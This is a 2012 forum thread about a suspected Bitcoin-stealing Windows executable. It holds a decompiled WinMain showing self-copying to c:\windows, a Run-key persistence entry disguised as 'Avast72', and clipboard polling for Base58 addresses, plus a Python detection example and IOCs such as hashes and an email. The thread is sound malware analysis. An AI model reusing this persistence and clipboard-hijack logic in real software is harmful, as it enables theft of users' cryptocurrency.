Title: "allseingbiteye" - a virus, or just weird?
Post by: ThePiachu on January 28, 2012, 03:45:25 AM
On the Bitcoin SE someone mentioned this site: http://allseeingbiteye.tk/ Question can be found here: http://bitcoin.stackexchange.com/q/2778/323
Has anyone checked whether this website is distributing some sort of virus?
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: grue on January 28, 2012, 04:10:28 AM
most likely a virus

decompiled winmain

int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  int v4; // ebx@1
  unsigned int v5; // eax@9
  SIZE_T v6; // edi@10
  HANDLE v7; // esi@10
  const char *v8; // ecx@11
  HANDLE v9; // eax@11
  void *v10; // esi@11
  const CHAR *v11; // eax@11
  int v12; // ecx@14
  int v13; // edi@14
  CHAR v14; // al@15
  HKEY hKey; // [sp+Ch] [bp-17Ch]@30
  char v17; // [sp+13h] [bp-175h]@3
  void *v18; // [sp+14h] [bp-174h]@29
  unsigned int v19; // [sp+28h] [bp-160h]@28
  const char *v20; // [sp+30h] [bp-158h]@9
  int v21; // [sp+40h] [bp-148h]@9
  unsigned int v22; // [sp+44h] [bp-144h]@9
  CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1
  char v24; // [sp+61h] [bp-127h]@2
  char v25; // [sp+68h] [bp-120h]@1
  CHAR String1[52]; // [sp+150h] [bp-38h]@11
  unsigned int v27; // [sp+184h] [bp-4h]@1
  int v28; // [sp+188h] [bp+0h]@1

  v27 = (unsigned int)&v28 ^ __security_cookie;
  v4 = operator new(4u);
  *(_DWORD *)v4 = 33120;
  dword_40D9E4 = v4;
  memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu);
  memset(&v25, 0, 0xE8u);
  if ( sub_401040() == *(_DWORD *)v4 + 9 )
    --v24;
  *(_DWORD *)v4 += 9;
  v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0;
  if ( sub_401040() == *(_DWORD *)v4 )
  {
    if ( v17 )
    {
      if ( byte_40D9E8 )
        GetModuleFileNameA(0, &ExistingFileName, 0x104u);
    }
  }
  if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) )
  {
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey);
    RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu);
    ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0);
    goto LABEL_31;
  }
  CreateMutexA(0, 0, "mcfartietray");
  if ( GetLastError() == 183 )
  {
LABEL_31:
    v0 = 0;
    return 0;
  }
  v5 = GetTickCount();
  srand(v5);
  v22 = 15;
  v21 = 0;
  LOBYTE(v20) = 0;
  if ( v17 )
  {
    while ( 1 )
    {
      do
      {
        do
        {
          Sleep(0x1F4u);
          OpenClipboard(0);
          v7 = GetClipboardData(1u);
          CloseClipboard();
          v6 = GlobalSize(v7);
        }
        while ( v6 - 30 > 9 );
        OpenClipboard(0);
        v9 = GetClipboardData(1u);
        v10 = v9;
        v11 = (const CHAR *)GlobalLock(v9);
        lstrcpyA(String1, v11);
        GlobalUnlock(v10);
        CloseClipboard();
        v8 = v20;
        if ( v22 < 0x10 )
          v8 = (const char *)&v20;
      }
      while ( !strcmp(String1, v8) );
      v13 = v6 - 1;
      v12 = 0;
      if ( v13 <= 0 )
      {
LABEL_26:
        if ( String1[0] == 49 || String1[0] == 51 )
        {
          sub_401430();
          sub_401590();
          if ( v19 >= 0x10 )
            operator delete(v18);
        }
      }
      else
      {
        while ( 1 )
        {
          v14 = String1[v12];
          if ( v14 < 49 || v14 > 57 )
          {
            if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) )
              break;
          }
          if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 )
            break;
          ++v12;
          if ( v12 >= v13 )
            goto LABEL_26;
        }
      }
    }
  }
  return 0;
}

it adds a program to system startup. pretty suspicious imo.
virus scan: https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html
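Added example, written for this thread and not code from grue's post or from the sample itself: it re-implements the two pieces of logic an analyst would pull out of the decompiled WinMain above, the filter that decides which clipboard contents the sample reacts to (buffer size 30..39 bytes, only Base58 characters, first character '1' or '3'), and a check of a Run-key listing for the persistence indicators it writes ("Avast72" pointing at c:\windows\mcfartietray.exe). It assumes GlobalSize() returns the string length plus one NUL byte; the clipboard strings are constructed (not real addresses) and the `reg query` output is constructed, not from a real machine.

```python
"""Added example, not code from the thread or the sample: mirrors the
clipboard filter and the Run-key persistence indicators visible in the
decompiled WinMain. Nothing here touches the clipboard or the registry;
every input is a constructed string."""

import re

# Indicators quoted from the decompiled listing.
RUN_VALUE_NAME = "Avast72"                     # RegSetValueExA value name
DROPPED_PATH = r"c:\windows\mcfartietray.exe"  # CopyFileA target / Run data
MUTEX_NAME = "mcfartietray"                    # CreateMutexA name

# The inner loop breaks on 108 'l', 73 'I', 79 'O' and 48 '0': exactly the
# four characters that Base58 leaves out of its alphabet.
BASE58_EXCLUDED = frozenset("lIO0")


def clipboard_would_be_targeted(text: str) -> bool:
    """Mirror of the decompiled filter.

    Outer do/while: GlobalSize() of the clipboard buffer must not satisfy
    `v6 - 30 > 9` (unsigned), i.e. it must be 30..39 bytes.  Assumption:
    the buffer is len(text) + 1 for the terminating NUL, so 29..38 chars.
    Inner loop: every character is 1-9, a-z or A-Z and not l, I, O, 0;
    any other character hits `break` and nothing happens.
    LABEL_26: the first character must be '1' (49) or '3' (51).
    """
    buf_size = len(text) + 1
    if not 30 <= buf_size <= 39:
        return False
    for ch in text:
        if not (ch.isascii() and ch.isalnum()) or ch in BASE58_EXCLUDED:
            return False  # the decompiled 'break'
    return text[0] in "13"


# One value line of `reg query HKLM\...\Run` output: name, type, data.
_RUN_LINE = re.compile(r"^\s*(?P<name>\S+)\s+REG_(?:EXPAND_)?SZ\s+(?P<data>.+?)\s*$")


def find_persistence_entries(reg_query_output: str) -> list:
    """Return (value name, data) pairs from Run-key listing text that match
    either indicator: the value name the sample writes, or data pointing
    at the dropped path (compared case-insensitively)."""
    hits = []
    for line in reg_query_output.splitlines():
        m = _RUN_LINE.match(line)
        if not m:
            continue
        name, data = m.group("name"), m.group("data")
        if name == RUN_VALUE_NAME or data.lower() == DROPPED_PATH:
            hits.append((name, data))
    return hits


# Constructed inputs: none of these are real addresses or a real registry.
CLIPBOARD_SAMPLES = {
    "1AbCdEfGhJkMnPqRsTuVwXyZ23456789ab": True,   # 34 Base58 chars, starts '1'
    "3AbCdEfGhJkMnPqRsTuVwXyZ23456789ab": True,   # same shape, starts '3'
    "1AbCdEfGhJkMnPqRsTuVwXyZ2345678Oab": False,  # contains 'O' (79)
    "mAbCdEfGhJkMnPqRsTuVwXyZ23456789ab": False,  # first char not '1'/'3'
    "1AbCdEf": False,                              # buffer below 30 bytes
    "please send the report by monday!": False,    # spaces and punctuation
}

SAMPLE_REG_QUERY = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\\system32\\SecurityHealthSystray.exe
    Avast72    REG_SZ    C:\\Windows\\mcfartietray.exe
"""


def triage_report() -> dict:
    """Classify every constructed clipboard sample with the sample's filter."""
    return {s: clipboard_would_be_targeted(s) for s in CLIPBOARD_SAMPLES}


if __name__ == "__main__":
    for sample, targeted in triage_report().items():
        print(f"{'TARGET' if targeted else 'ignore'}  {sample!r}")
    print("Run-key hits:", find_persistence_entries(SAMPLE_REG_QUERY))
```

The size window and the Base58 character test together explain why ordinary text on the clipboard never triggers sub_401430/sub_401590: only something shaped like a Base58 Bitcoin address of 29 to 38 characters starting with '1' or '3' passes, which is what makes a 500 ms clipboard poll from an unknown process worth flagging in a sandbox report.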
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: dooglus on January 28, 2012, 07:01:55 AM
decompiled winmain
That's pretty impressive. What tool did you use to do that?
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: sveetsnelda on January 28, 2012, 07:48:46 AM
It even makes the run entry look like it's an antivirus scanner (Avast72). :)
Most certainly a virus/malware/spyware.
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: CD-RW on February 14, 2012, 09:12:47 AM
Sorry for bumping, I found some new information... A new link got added about a Bitcoin generator on some Tor forum.
"Bitcoin generator.exe" 51.735 bytes. SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/
I found this thread due to the fact that he still uses c:\windows\mcfartietrby.exe. I also found this email in the binary data: seren1ty0wns@gmail.com
Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: MPOE-PR on April 20, 2012, 12:50:06 AM
mcfartietray.exe ...McFartieTray?! Sounds foul either way.